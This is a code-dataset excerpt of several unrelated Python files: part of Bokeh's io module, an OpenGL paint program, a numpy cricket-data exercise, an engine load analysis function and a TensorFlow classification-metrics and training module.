``output_notebook`` enabled), returns\n a handle that can be used by ``push_notebook``, None otherwise.\n\n .. note::\n The ``browser`` and ``new`` parameters are ignored when showing in\n an IPython/Jupyter notebook.\n\n '''\n return _show_with_state(obj, _state, browser, new)\n\ndef _show_with_state(obj, state, browser, new):\n controller = browserlib.get_browser_controller(browser=browser)\n\n comms_handle = None\n\n if state.notebook:\n comms_handle = _show_notebook_with_state(obj, state)\n\n elif state.server_enabled:\n _show_server_with_state(obj, state, new, controller)\n\n if state.file:\n _show_file_with_state(obj, state, new, controller)\n\n return comms_handle\n\ndef _show_file_with_state(obj, state, new, controller):\n save(obj, state=state)\n controller.open(\"file://\" + os.path.abspath(state.file['filename']), new=_new_param[new])\n\ndef _show_notebook_with_state(obj, state):\n if state.server_enabled:\n push(state=state)\n snippet = autoload_server(obj, session_id=state.session_id_allowing_none, url=state.url, app_path=state.app_path)\n publish_display_data({'text/html': snippet})\n else:\n comms_target = make_id()\n publish_display_data({'text/html': notebook_div(obj, comms_target)})\n handle = _CommsHandle(get_comms(comms_target), state.document, state.document.to_json())\n state.last_comms_handle = handle\n return handle\n\ndef _show_server_with_state(obj, state, new, controller):\n push(state=state)\n show_session(session_id=state.session_id_allowing_none, url=state.url, app_path=state.app_path,\n new=new, controller=controller)\n\ndef save(obj, filename=None, resources=None, title=None, state=None, validate=True):\n ''' Save an HTML file with the data for the current document.\n\n Will fall back to the default output state (or an explicitly provided\n :class:`State` object) for ``filename``, ``resources``, or ``title`` if they\n are not provided.\n\n Args:\n obj (Document or model object) : a plot object to save\n\n filename (str, optional) : filename to save document under (default: None)\n If None, use the default state configuration, otherwise raise a\n ``RuntimeError``.\n\n resources (Resources, optional) : A Resources config to use (default: None)\n If None, use the default state configuration, if there is one.\n otherwise use ``resources.INLINE``.\n\n title (str, optional) : a title for the HTML document (default: None)\n If None, use the default state title value, if there is one.\n Otherwise, use \"Bokeh Plot\"\n\n validate (bool, optional) : True to check integrity of the models\n\n Returns:\n None\n\n Raises:\n RuntimeError\n\n '''\n if state is None:\n state = _state\n\n filename, resources, title = _get_save_args(state, filename, resources, title)\n\n _save_helper(obj, filename, resources, title, validate)\n\ndef _get_save_args(state, filename, resources, title):\n\n if filename is None and state.file:\n filename = state.file['filename']\n\n if resources is None and state.file:\n resources = state.file['resources']\n\n if title is None and state.file:\n title = state.file['title']\n\n if filename is None:\n raise RuntimeError(\"save() called but no filename was supplied and output_file(...) was never called, nothing saved\")\n\n if resources is None:\n warnings.warn(\"save() called but no resources were supplied and output_file(...) was never called, defaulting to resources.CDN\")\n from .resources import CDN\n resources = CDN\n\n if title is None:\n warnings.warn(\"save() called but no title was supplied and output_file(...) was never called, using default title 'Bokeh Plot'\")\n title = \"Bokeh Plot\"\n\n return filename, resources, title\n\ndef _save_helper(obj, filename, resources, title, validate):\n with _ModelInDocument(obj):\n if isinstance(obj, Component):\n doc = obj.document\n elif isinstance(obj, Document):\n doc = obj\n else:\n raise RuntimeError(\"Unable to save object of type '%s'\" % type(obj))\n\n if validate:\n doc.validate()\n\n html = standalone_html_page_for_models(obj, resources, title)\n\n with io.open(filename, \"w\", encoding=\"utf-8\") as f:\n f.write(decode_utf8(html))\n\n# this function exists mostly to be mocked in tests\ndef _push_to_server(session_id, url, app_path, document, io_loop):\n session = push_session(document, session_id=session_id, url=url, app_path=app_path, io_loop=io_loop)\n session.close()\n session.loop_until_closed()\n\ndef push(session_id=None, url=None, app_path=None, document=None, state=None, io_loop=None, validate=True):\n ''' Update the server with the data for the current document.\n\n Will fall back to the default output state (or an explicitly\n provided :class:`State` object) for ``session_id``, ``url``,\n ``app_path``, or ``document`` if they are not provided.\n\n Args:\n session_id (str, optional) : a Bokeh server session ID to push objects to\n\n url (str, optional) : a Bokeh server URL to push objects to\n\n app_path (str, optional) : Relative application path to push objects to\n\n document (Document, optional) : A :class:`bokeh.document.Document` to use\n\n state (State, optional) : A state to use for any output_server() configuration of session or url\n\n io_loop (tornado.ioloop.IOLoop, optional) : Tornado IOLoop to use for connecting to server\n\n validate (bool, optional) : True to check integrity of the document we are pushing\n\n Returns:\n None\n\n '''\n if state is None:\n state = _state\n\n if not session_id:\n session_id = state.session_id_allowing_none\n\n if not url:\n url = state.url\n\n if not app_path:\n app_path = state.app_path\n\n # State is supposed to ensure these are set\n assert session_id is not None\n assert url is not None\n assert app_path is not None\n\n if not document:\n document = state.document\n\n if not document:\n warnings.warn(\"No document to push\")\n\n if validate:\n document.validate()\n\n _push_to_server(session_id=session_id, url=url, app_path=app_path,\n document=document, io_loop=io_loop)\n\ndef push_notebook(document=None, state=None, handle=None):\n ''' Update the last-shown plot in a Jupyter notebook with the new data\n or property values.\n\n Args:\n\n document (Document, optional) :\n A :class:`~bokeh.document.Document` to push from. If None,\n uses ``curdoc()``.\n\n state (State, optional) :\n A Bokeh State object\n\n Returns:\n None\n\n Examples:\n\n Typical usage is typically similar to this:\n\n .. code-block:: python\n\n from bokeh.io import push_notebook\n\n # code to create a plot\n\n show(plot)\n\n plot.title = \"New Title\"\n\n # This will cause the title to update\n push_notebook()\n\n '''\n if state is None:\n state = _state\n\n if state.server_enabled:\n raise RuntimeError(\"output_server() has been called, use push() to push to server\")\n\n if not document:\n document = state.document\n\n if not document:\n warnings.warn(\"No document to push\")\n return\n\n if handle is None:\n handle = state.last_comms_handle\n\n if not handle:\n warnings.warn(\"Cannot find a last shown plot to update. Call output_notebook() and show() before push_notebook()\")\n return\n\n to_json = document.to_json()\n if handle.doc is not document:\n msg = dict(doc=to_json)\n else:\n msg = Document._compute_patch_between_json(handle.json, to_json)\n handle.comms.send(json.dumps(msg))\n handle.update(document, to_json)\n\ndef reset_output(state=None):\n ''' Clear the default state of all output modes.\n\n Returns:\n None\n\n '''\n _state.reset()\n\ndef _remove_roots(subplots):\n doc = _state.document\n for sub in subplots:\n if sub in doc.roots:\n doc.remove_root(sub)\n\ndef _push_or_save(obj):\n if _state.server_enabled and _state.autopush:\n push()\n if _state.file and _state.autosave:\n save(obj)\n\ndef gridplot(plot_arrangement, **kwargs):\n ''' Generate a plot that arranges several subplots into a grid.\n\n Args:\n plot_arrangement (nested list of Plots) : plots to arrange in a grid\n **kwargs: additional attributes to pass in to GridPlot() constructor\n\n .. note:: ``plot_arrangement`` can be nested, e.g [[p1, p2], [p3, p4]]\n\n Returns:\n grid_plot: a new :class:`GridPlot `\n\n '''\n subplots = itertools.chain.from_iterable(plot_arrangement)\n _remove_roots(subplots)\n grid = GridPlot(children=plot_arrangement, **kwargs)\n curdoc().add_root(grid)\n _push_or_save(grid)\n return grid\n\ndef hplot(*children, **kwargs):\n ''' Generate a layout that arranges several subplots horizontally.\n\n '''\n _remove_roots(children)\n layout = HBox(children=list(children), **kwargs)\n curdoc().add_root(layout)\n _push_or_save(layout)\n return layout\n\ndef vplot(*children, **kwargs):\n ''' Generate a layout that arranges several subplots vertically.\n\n '''\n _remove_roots(children)\n layout = VBox(children=list(children), **kwargs)\n curdoc().add_root(layout)\n _push_or_save(layout)\n return layout\n\ndef vform(*children, **kwargs):\n ''' Generate a layout that arranges several subplots vertically.\n\n '''\n layout = VBoxForm(children=list(children), **kwargs)\n curdoc().add_root(layout)\n _push_or_save(layout)\n return layout\n","sub_path":"pkgs/bokeh-0.11.1-py27_0/lib/python2.7/site-packages/bokeh/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":20046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"461109153","text":"#final project\n\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\nfrom OpenGL.GLUT import *\nfrom PIL import Image\nimport numpy as np\n\nimport sys\n\nwindowWidth=1920\nwindowHeight=1080\n\nmousePositionX = 0\nmousePositionY = 0\n\nmouseDrawPositionX = 0\nmouseDrawPositionY = 0\n\nselectedPencil=0\n\n\npencilPoints = []\neraserPoints=[]\n\npencilTextureId=0\neraserTextureId=0\nquadTextureId=0\n\nisClicked = False\nisFirst=True\n\npanelOptions=[\"Pencil\",\"Eraser\",\"Quads\"] #Ekleme yapılacak\nselectedPanel=str()\nquads=[] #quadları tutan liste\nquadPoints=[] #quadın koordinatlarını tutan liste\n\ndef LoadTexture(file):\n pencilImg = Image.open(file)\n xSize = pencilImg.size[0]\n ySize = pencilImg.size[1]\n rawReference = pencilImg.tobytes(\"raw\", \"RGB\")\n\n glClearColor(1, 1, 1, 0)\n\n # Create Texture\n id = glGenTextures(1)\n glBindTexture(GL_TEXTURE_2D, id) # bind Texture, 2d texture (x and y size)\n glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_REPEAT)\n glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_REPEAT)\n glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)\n glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR)\n glTexImage2D(GL_TEXTURE_2D, 0, 3, xSize, ySize, 0, GL_RGB, GL_UNSIGNED_BYTE, rawReference)\n glEnable(GL_TEXTURE_2D)\n return id\n\n\ndef display(id):\n \"\"\"Glut display function.\"\"\"\n #glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n #LoadTexture(\"img/pencil.png\")\n glBindTexture(GL_TEXTURE_2D, id)\n glBegin(GL_QUADS)\n\n glTexCoord2f(0, 0)\n glVertex3f(-1, 1, 0)\n\n glTexCoord2f(0, 1)\n glVertex3f(-1, -1, 0)\n\n glTexCoord2f(1,1)\n glVertex3f(1, -1, 0)\n\n glTexCoord2f(1,0)\n glVertex3f(1, 1, 0)\n glEnd()\n glFlush()\n\n\ndef InitGL():\n global pencilTextureId, eraserTextureId,quadTextureId\n glActiveTexture(GL_TEXTURE0)\n pencilTextureId = LoadTexture(\"./img/pencil.png\")\n eraserTextureId = LoadTexture(\"./img/eraser2.png\")\n quadTextureId=LoadTexture(\"./img/quads.png\")\n glEnable(GL_TEXTURE_2D)\n glClearColor(0.0, 0.0, 0.0, 0.0) #darkmode\n glMatrixMode(GL_PROJECTION)\n glLoadIdentity()\n #gluOrtho2D(-6, 6, -6, 6)\n glMatrixMode(GL_MODELVIEW)\n glLoadIdentity()\n\ndef paintBackground(r,g,b):\n glColor3f(r,g,b)\n glBegin(GL_QUADS)\n glVertex2f(-1, 1)\n glVertex2f(-1, -1)\n glVertex2f(1, -1)\n glVertex2f(1, 1)\n glEnd()\n\ndef controlPanel(): #panel\n global selectedPencil\n global panelOptions\n glViewport(0, 735, 1540, 110)\n paintBackground(1,0,0)\n glViewport(0,735,100,110)\n if selectedPanel==panelOptions[0]:\n paintBackground(0.6, 0.6, 0.6)\n else:\n paintBackground(0.9,0.9,0.9)\n\n display(pencilTextureId)\n glViewport(100,735,100,110)\n if selectedPanel == panelOptions[1]:\n paintBackground(0.6, 0.6, 0.6)\n else:\n paintBackground(0.9, 0.9, 0.9)\n display(eraserTextureId)\n glViewport(200, 735, 100, 110)\n if selectedPanel == panelOptions[2]:\n paintBackground(0.6, 0.6, 0.6)\n else:\n paintBackground(0.9, 0.9, 0.9)\n display(quadTextureId)\n glViewport(300, 735, 100, 110)\n paintBackground(0, 1, 0)\n\ndef convertMousePosDrawAxis(mouseDrawPositionX,mouseDrawPositionY): #convert mouse position to drawing axis position\n point = []\n point.append ((mouseDrawPositionX-770)/770)\n point.append( (110+367.5-mouseDrawPositionY)/367.5)\n\n return point\n\ndef pencilDraw(): #Kalemin cizim yaptıgı fonksiyon\n global mousePositionX, mousePositionY\n global mouseDrawPositionX,mouseDrawPositionY\n global pencilPoints\n\n if isClicked==True:\n point = convertMousePosDrawAxis(mouseDrawPositionX,mouseDrawPositionY)\n pencilPoints.append(point)\n\ndef eraser():\n global mousePositionX, mousePositionY\n global mouseDrawPositionX, mouseDrawPositionY\n global eraserPoints\n if isClicked == True:\n point = convertMousePosDrawAxis(mouseDrawPositionX, mouseDrawPositionY)\n eraserPoints.append(point)\n glPointSize(10.0)\n glColor(0, 1, 0)\n\ndef quadDraw():\n global mousePositionX, mousePositionY\n global mouseDrawPositionX, mouseDrawPositionY\n global quads,quadPoints\n global isFirst\n '''if isClicked==True:\n if isFirst:\n point = convertMousePosDrawAxis(mousePositionX, mousePositionY)\n quadPoints.append(point)\n isFirst=False\n if len(quadsPoints)>0:\n ammar1=quadsPoints[0][0]\n ammar2=quadsPoints[0][1]\n print(\"ammar\")\n glLineWidth(5)\n glColor3f(0,0,0)\n glBegin(GL_QUADS)\n glVertex2f(ammar1[0], ammar1[1])\n glVertex2f(ammar2[0], ammar1[1])\n glVertex2f(ammar2[0], ammar2[1])\n glVertex2f(ammar1[0], ammar2[1])\n glEnd()\n glBegin(GL_QUADS)\n glVertex2f(quadsPoints[0][0][0],quadsPoints[0][0][1])\n glVertex2f(quadsPoints[0][1][0],quadPoints[0][0][1])\n glVertex2f(quadsPoints[0][1][0],quadsPoints[0][1][1])\n glVertex2f(quadsPoints[0][0][0],quadsPoints[0][1][1])\n glEnd()'''\n '''else:\n point = convertMousePosDrawAxis(mousePositionX, mousePositionY)\n quadPoints.append(point)\n \n glLineWidth(5)\n glColor3f(0,0,0)\n glBegin(GL_QUADS)\n glVertex2f(quadPoints[0][0],quadPoints[0][1])\n glVertex2f(mouseDrawPositionX,quadPoints[0][1])\n glVertex2f(mouseDrawPositionX,mouseDrawPositionY)\n glVertex2f(quadPoints[0][0],mouseDrawPositionY)\n glEnd()'''\n\ndef draw(): #beyaz ekrana yapılacak cizim\n global selectedPanel\n global panelOptions\n global pencilPoints\n global quadPoints,quads\n glViewport(0, 0, 1540, 735)\n paintBackground(1, 1, 1)\n if selectedPanel == panelOptions[0]:\n pencilDraw()\n glPointSize(5.0)\n glColor(0, 0, 0)\n glBegin(GL_POINTS)\n for i in range(len(pencilPoints)):\n glVertex2f(pencilPoints[i][0], pencilPoints[i][1])\n glEnd()\n if selectedPanel==panelOptions[1]:\n eraser()\n glPointSize(15.0)\n glColor(1, 1, 1)\n glBegin(GL_POINTS)\n for i in range(len(eraserPoints)):\n searchAndRemove(i)\n glEnd()\n if selectedPanel==panelOptions[2]:\n quadDraw()\n if len(quads)>0:\n print(quads)\n point1=quads[0][0]\n point2=quads[0][1]\n\n glColor3f(1,0,0)\n glBegin(GL_QUADS)\n glVertex2f(point1[0], point1[1])\n glVertex2f(point2[0], point1[1])\n glVertex2f(point2[0], point2[1])\n glVertex2f(point1[0], point2[1])\n glEnd()\n\n\ndef paint(): #Ana Fonksiyon\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n # gluPerspective( fovy, aspect, zNear, zFar )\n # gluPerspective(150, 1.5, 1, 20)\n controlPanel()\n draw()\n glutSwapBuffers()\n\ndef mouseFunction(*args):\n global selectedPanel,panelOptions,isFirst\n global mousePositionX,mousePositionY,isClicked,selectedPencil,eraserPoints,quadPoints,quads\n\n mousePositionX = args[2]\n mousePositionY = args[3]\n\n if(args[0]==GLUT_LEFT_BUTTON and args[1]==GLUT_DOWN):\n isClicked=True\n if(mousePositionX<100 and mousePositionY<110):\n selectedPanel=panelOptions[0]\n eraserPoints=[]\n elif 100 < mousePositionX < 200 and mousePositionY<110:\n selectedPanel=panelOptions[1]\n elif 200110 and selectedPanel==panelOptions[2]: #farenin ilk dokunusunda koordinat alır\n if isFirst:\n quadPoints.append(convertMousePosDrawAxis(mousePositionX,mousePositionY))\n isFirst=False\n else:\n isClicked=False\n '''elif args[0]==GLUT_LEFT_BUTTON and args[1]==GLUT_UP: #Fareden el kaldırıldıgındaki son noktayı alır \n isClicked=False\n if mousePositionY > 110 and selectedPanel==panelOptions[2]:\n quadPoints.append(convertMousePosDrawAxis(mousePositionX, mousePositionY))\n quads.append(quadPoints)'''\n\n\n glutPostRedisplay()\n\ndef mouseControl( mx, my):\n global mouseDrawPositionX,mouseDrawPositionY,quadPoints,quads\n mouseDrawPositionX = mx\n mouseDrawPositionY = my\n if mousePositionY > 110 and selectedPanel == panelOptions[2]:\n if len(quadPoints)>1:\n quadPoints.pop()\n quadPoints.append(convertMousePosDrawAxis(mouseDrawPositionX, mouseDrawPositionY))\n quads.append(quadPoints)\n print(\"quads boyutu\") #fareyle dolandırma gecince quads boyutu sabit kalıyor\n print(len(quads))\n\n\n\ndef searchAndRemove(idx):\n global pencilPoints,eraserPoints\n for i in range(len(pencilPoints)):\n if len(eraserPoints)>idx:\n if (abs(pencilPoints[i][0] - eraserPoints[idx][0])<=0.01 and abs(pencilPoints[i][1]-eraserPoints[idx][1])<=0.01):\n pencilPoints.pop(i)\n #eraserPoints.pop(idx)\n return True\n return False\n\n\n\ndef main():\n global windowWidth\n global windowHeight\n glutInit(sys.argv)\n glutInitDisplayMode(GLUT_RGB | GLUT_DOUBLE)\n glutInitWindowSize(windowWidth, windowHeight)\n glutInitWindowPosition(0,0)\n glutCreateWindow(b\"Paint 3D\")\n glutDisplayFunc(paint)\n glutIdleFunc(paint)\n glutMouseFunc(mouseFunction)\n glutMotionFunc(mouseControl)\n #glutSpecialFunc(keyPressed)\n InitGL()\n glutMainLoop()\n\n\nmain()\n","sub_path":"paint3D.py","file_name":"paint3D.py","file_ext":"py","file_size_in_byte":9380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"111309353","text":"# %load q01_get_total_deliveries_players/build.py\n# Default imports\nimport numpy as np\n\nipl_matches_array =np.genfromtxt('data/ipl_matches_small.csv', dtype='|S50', skip_header=1, delimiter=',')\n\n# Your Solution\ndef get_total_deliveries_played(batsman):\n batcount = 0\n #ptn=ipl_matches_array[:,13].astype(np.unicode_)\n ptn=ipl_matches_array[:,13]\n batcount = int(np.sum(ptn == batsman))\n return batcount \n\nget_total_deliveries_played(b'SR Tendulkar')\n\n\n\n","sub_path":"q01_get_total_deliveries_players/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"600507298","text":"\"\"\"Function checks the load on the engine and returns it as overloaded or not.\"\"\"\n\nimport numpy as np\nimport pandas as pd\n\ndef LoadAnalysis(EngineLoad, EngineRPM, VehicleSpeed, TripTime):\n GearRatio = 1.5\n AxleRatio = 4\n TyreSize = 12\n ExpectedSpeed = []\n MaxLoad = 0\n MaxRPM = 0\n TempEngineLoadLess = []\n TempEngineLoadMore = []\n TempEngineRPMLess = []\n TempEngineRPMMore = []\n TempVehicleSpeedLess = []\n TempVehicleSpeedMore = []\n\n CounterOverload = []\n TempCounterOverload = 0\n\n for i in EngineLoad.index:\n EngineLoad[i] = float(EngineLoad[i])\n EngineRPM[i] = float(EngineRPM[i])\n\n if MaxLoad < EngineLoad[i]:\n MaxLoad = EngineLoad[i]\n\n if MaxRPM < EngineRPM[i]:\n MaxRPM = EngineRPM[i]\n\n LoadThreshold = 0.5 * MaxLoad\n RPMThreshold = 0.5 * MaxRPM\n\n for i in EngineRPM.index:\n if (EngineLoad[i] < LoadThreshold): # Checking whether vehicle speed is less than expected speed\n TempEngineLoadLess.append([EngineLoad[i], i])\n else:\n TempEngineLoadMore.append([EngineLoad[i], i])\n\n if (EngineRPM[i] < RPMThreshold): # Checking whether vehicle speed is less than expected speed\n TempEngineRPMLess.append([EngineRPM[i], i])\n else:\n TempEngineRPMMore.append([EngineRPM[i], i])\n\n if EngineLoad[i] > LoadThreshold and EngineRPM[i] > RPMThreshold:\n TempCounterOverload = TempCounterOverload + 1 # Checking whether engine load and engine rpm are less than threshold\n CounterOverload.append(TempCounterOverload)\n\n VehicleSpeed[i] = float(VehicleSpeed[i])\n\n # ACTUAL SPEED = (ENGINE RPM * PERIMETER OF TYRE)/(AXLE RATIO * GEAR RATIO)\n ExpectedSpeed.append(\n 0.4 * (EngineRPM[i] * 60 * 3.14 * 2 * TyreSize * 25.4 * 0.000001) / (GearRatio * AxleRatio))\n\n if (VehicleSpeed[i] < (ExpectedSpeed[i])): # Checking whether vehicle speed is less than expected speed\n TempVehicleSpeedLess.append([VehicleSpeed[i], i])\n else:\n TempVehicleSpeedMore.append([VehicleSpeed[i], i])\n\n EngineLoadLess = pd.DataFrame(data=TempEngineLoadLess, columns=['EngineLoad', 'Index'])\n EngineLoadMore = pd.DataFrame(data=TempEngineLoadMore, columns=['EngineLoad', 'Index'])\n EngineRPMLess = pd.DataFrame(data=TempEngineRPMLess, columns=['EngineRPM', 'Index'])\n EngineRPMMore = pd.DataFrame(data=TempEngineRPMMore, columns=['EngineRPM', 'Index'])\n VehicleSpeedLess = pd.DataFrame(data=TempVehicleSpeedLess, columns=['VehicleSpeed', 'Index'])\n VehicleSpeedMore = pd.DataFrame(data=TempVehicleSpeedMore, columns=['VehicleSpeed', 'Index'])\n\n return EngineLoadLess, EngineLoadMore, EngineRPMLess, EngineRPMMore, VehicleSpeedLess, VehicleSpeedMore, ExpectedSpeed, LoadThreshold, RPMThreshold, CounterOverload\n","sub_path":"Function/DIAEngineAnalysis_LoadAnalysis/DIAEngineAnalysis.py","file_name":"DIAEngineAnalysis.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"553852528","text":"#! cd .. && python36 -m mlf.experiment\n\nimport os\nimport sys\nimport shutil\nimport logging\nimport shutil\n\nfrom .core.mnist import MnistDataset\nfrom .core.audio import AudioDataset\nfrom .core.config import AutoEncoderConfig\nfrom .models.autoencoder import autoencoder\nfrom .models.vae import vae\nfrom .tools.freeze import freeze\nfrom .models.lstm2 import lstm2\nfrom .models.cnn import cnn\n\nimport tensorflow as tf\nfrom tensorflow.contrib.tensorboard.plugins import projector\nimport numpy as np\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport json\n\ntry:\n from SigProc.histogrammer import AutomaticScale\nexcept ImportError as e:\n print(e)\n\nclass ClassificationMetricsCalculator(object):\n \"\"\"docstring for ClassificationMetricsCalculator\"\"\"\n _counter = 0\n def __init__(self, outfile, nClasses, initializer, logits, labels, name=None, seed=None):\n super(ClassificationMetricsCalculator, self).__init__()\n\n if name is None:\n ClassificationMetricsCalculator._counter += 1\n name = \"ClassificationMetricsCalculator-%03d\" % (\n ClassificationMetricsCalculator._counter)\n\n self.name = name\n self.initializer = initializer\n self.nClasses = nClasses\n self.logits = logits\n self.labels = labels\n self.seed = seed\n self.outfile = outfile\n\n self._init()\n\n def _init(self):\n y_true = tf.argmax(self.labels, 1)\n y_pred = tf.argmax(self.logits, 1)\n\n recall = [0] * self.nClasses\n update_op_rec = [None] * self.nClasses\n precision = [0] * self.nClasses\n update_op_prec = [None] * self.nClasses\n\n with tf.name_scope(self.name):\n\n for k in range(self.nClasses):\n y1 = tf.equal(y_true, k)\n y2 = tf.equal(y_pred, k)\n recall[k], update_op_rec[k] = tf.metrics.recall(\n labels=y1, predictions=y2)\n precision[k], update_op_prec[k] = tf.metrics.precision(\n labels=y1, predictions=y2)\n\n conf_mat_update, conf_mat = self._streamingConfMatrix(\n y_pred,\n y_true,\n self.nClasses)\n\n metric_vars = tf.get_collection(\n tf.GraphKeys.LOCAL_VARIABLES, scope=self.name)\n\n metric_init_op = tf.variables_initializer(var_list=metric_vars)\n\n self.op_init = [metric_init_op]\n if self.initializer is not None:\n self.op_init.append(self.initializer)\n\n self.op_update = (update_op_rec, update_op_prec, conf_mat_update)\n self.op_compute = (recall, precision, conf_mat)\n\n def _streamingConfMatrix(self, prediction, label, nClasses):\n\n with tf.name_scope(\"conf_matrix\"):\n # Compute a per-batch confusion\n batch_confusion = tf.confusion_matrix(\n label,\n prediction,\n num_classes=nClasses,\n name='batch_confusion'\n )\n\n # Create an accumulator variable to hold the counts\n confusion = tf.Variable(\n tf.zeros([nClasses, nClasses],\n dtype=tf.int32),\n name='confusion',\n collections=[tf.GraphKeys.LOCAL_VARIABLES]\n )\n\n # Create the update op for doing a \"+=\" accumulation on the batch\n confusion_update = confusion.assign(confusion + batch_confusion)\n\n return confusion_update, confusion\n\n def run(self, session):\n\n feed = {}\n if self.seed is not None:\n feed[self.seed] = 0\n\n session.run(self.op_init, feed_dict=feed)\n\n try:\n while True:\n session.run(self.op_update)\n\n except tf.errors.OutOfRangeError:\n self._proc(*session.run(self.op_compute))\n\n def _proc(self, recall, precision, confmat):\n precision = np.array(precision)\n recall = np.array(recall)\n confmat = np.array(confmat)\n F1 = 2 * ((precision * recall) / (precision + recall))\n\n total = 0\n correct = 0\n incorrect = 0\n errs = []\n accs = []\n for i in range(len(confmat)):\n total_class = sum(confmat[i])\n total += total_class\n err = total_class - confmat[i][i]\n incorrect += err\n acc = confmat[i][i]\n correct += acc\n errs.append(err / total_class)\n accs.append(acc / total_class)\n err_mean = incorrect / total\n acc_mean = correct / total\n\n srecall = ', '.join([\"%0.6f\" % v for v in recall])\n sprecision = ', '.join([\"%0.6f\" % v for v in precision])\n sF1 = ', '.join([\"%0.6f\" % v for v in F1])\n\n serr = ', '.join([\"%0.6f\" % v for v in errs])\n sacc = ', '.join([\"%0.6f\" % v for v in accs])\n\n # determine maximum vlaue in the confusion matrix, for alignment\n n = len(\"%s\" % np.max(confmat))\n fmt = \"%%%dd\" % n\n\n with open(self.outfile, \"a\") as af:\n def log(msg):\n msg = msg + \"\\n\"\n sys.stdout.write(msg)\n af.write(msg)\n\n log(\"recall: (%.6f) %s\" % (np.mean(recall), srecall))\n log(\"precision: (%.6f) %s\" % (np.mean(precision), sprecision))\n log(\"F1_score: (%.6f) %s\" % (np.mean(F1), sF1))\n log(\"%%error: (%.6f) %s\" % (err_mean, serr))\n log(\"accuracy: (%.6f) %s\" % (acc_mean, sacc))\n\n log(\"row: actual class\")\n log(\"col: predicted class\")\n\n # print a header for the confusion matrix\n s = \" | \".join([fmt % i for i in range(self.nClasses)])\n log(\" \" * n + \" \" + s + \" |\")\n\n # print confusion matrix data\n for i, row in enumerate(confmat):\n s = \" | \".join([fmt % v for v in row])\n log(fmt % i + \" | \" + s + \" |\")\n log(\"\\n\")\n\nclass TrainerBase(object):\n\n def __init__(self):\n super(TrainerBase, self).__init__()\n\n def checkpointExists(self):\n\n return os.path.exists(os.path.join(\n self.settings['outputDir'], \"checkpoint\"))\n\n def restore(self, sess):\n self.saver.restore(sess,\n tf.train.latest_checkpoint(self.settings['outputDir']))\n\n def beforeSession(self):\n self.init_op = tf.group(tf.global_variables_initializer(),\n tf.local_variables_initializer())\n\n self.saver = tf.train.Saver(max_to_keep=None)\n\n def train(self, sess):\n\n logging.info(\"training model\")\n\n sess.run(self.init_op)\n\n tf.train.write_graph(\n sess.graph.as_graph_def(),\n self.settings['outputDir'],\n self.settings['modelFile'],\n as_text=True\n )\n\n final_cost_train = []\n final_cost_dev = []\n\n for epoch_i in range(self.settings['nEpochs']):\n\n sess.run(self.dataset.initializer(),\n feed_dict={self.seed: epoch_i})\n\n self.onEpochBegin(sess, epoch_i)\n\n train_cost, train_points = self._epoch_train_step(sess, epoch_i)\n final_cost_train.append((epoch_i, train_cost))\n print(\"final train cost: %f\" % train_cost)\n\n dev_cost, dev_points = self._epoch_dev_step(sess, epoch_i)\n final_cost_dev.append((epoch_i, dev_cost))\n print(\"final dev cost: %f\" % dev_cost)\n\n self._write_cost_graph(\"%03d\" % epoch_i, train_points, dev_points)\n\n self.saver.save(sess, self.settings['checkpointFile'],\n global_step=epoch_i)\n\n self.onEpochEnd(sess, epoch_i)\n\n # write a final graph showing cost as a function of epoch\n self._write_cost_graph(\"final\", final_cost_train, final_cost_dev)\n\n def _epoch_train_step(self, sess, epoch_i):\n \"\"\"\n train a single epoch\n train on all available samples, periodically print the\n training cost\n \"\"\"\n\n epoch_cost = []\n step = 0\n total_cost = 0\n while True:\n try:\n # train on a single batch\n # record the value loss/cost function\n _, cost = sess.run([self.train_op,\n self.train_ops['cost']])\n total_cost += cost\n step += 1\n\n # periodically print out the cost\n # TODO: consider printing out every 15 seconds\n update_period = int(500 / self.settings['batch_size'])\n\n x = step * self.settings['batch_size']\n if step % update_period == 0:\n y = total_cost / x\n msg = \"%2d: step: %5d cost: %.7f\"\n print(msg % (epoch_i, step, total_cost / x))\n epoch_cost.append((x, y))\n\n if self.settings['max_steps'] > 0 and \\\n step > self.settings['max_steps']:\n break\n except tf.errors.OutOfRangeError:\n break\n\n mean_cost = total_cost / (step * self.settings['batch_size'])\n return mean_cost, epoch_cost\n\n def _epoch_dev_step(self, sess, epoch_i):\n\n epoch_cost = []\n step = 0\n total_cost = 0\n while True:\n try:\n cost = sess.run(self.dev_ops['cost'])\n total_cost += cost\n step += 1\n\n update_period = int(500 / self.settings['batch_size'])\n if step % update_period == 0:\n\n x = step * self.settings['batch_size']\n y = total_cost / x\n epoch_cost.append((x, y))\n\n sys.stdout.write(\".\")\n sys.stdout.flush()\n\n break;\n except tf.errors.OutOfRangeError:\n break\n sys.stdout.write(\"\\n\")\n\n x = step * self.settings['batch_size']\n msg = \"%2d: dev: step: %5d cost: %.7f\"\n print(msg % (epoch_i, step, total_cost / x))\n\n mean_cost = total_cost / (step * self.settings['batch_size'])\n return mean_cost, epoch_cost\n\n def _write_cost_graph(self, tag, points_train, points_dev):\n \"\"\"\n save a json file containing the points for plotting two graphs\n points should be an array of (x,y) pairs\n \"\"\"\n jo = {\n \"mode\": \"multiline\",\n \"data\": {\"train\": points_train, \"dev\": points_dev},\n \"xlabel\": \"#Samples\",\n \"ylabel\": \"Cost\",\n \"title\": \"Train Cost for Epoch %s\" % tag,\n }\n\n path = os.path.join(self.settings['outputDir'],\n \"epoch_cost_%s.json\" % tag)\n\n with open(path, \"w\") as wf:\n json.dump(jo, wf, sort_keys=True, 